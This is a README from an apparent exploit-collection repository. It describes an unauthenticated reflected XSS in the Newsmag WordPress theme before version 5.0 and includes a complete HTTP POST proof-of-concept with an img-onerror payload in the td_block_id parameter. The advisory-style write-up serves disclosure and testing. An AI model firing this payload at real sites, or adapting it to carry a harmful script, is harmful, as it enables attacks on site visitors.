crash.software
Projects
Pull Requests
Issues
Builds
WP-Vulnerabilities-Exploits
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY WP-Vulnerabilities-Exploits Files
🤬
main
..
README.md Loading last commit info...
README.md

Newsmag < 5.0 - Unauthenticated Reflected Cross-site Scripting (XSS)

Description
The theme does not sanitise the td_block_id parameter in its td_ajax_block AJAX action, leading to an unauthenticated Reflected Cross-site Scripting (XSS) vulnerability.
Due to a nonce check, this issue is only exploitable on unauthenticated users (for as long as the nonce used in the request is valid)

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 136

Connection: close



action=td_ajax_block&td_block_id="><img+src+onerror=alert(document.domain)>&block_type=td_block_related_posts&td_magic_token=59c7ec0654

References

https://wpscan.com/vulnerability/bb71f2f9-76bd-43f4-a8c9-35771dd28dff

Please wait...
Page is in error, reload to recover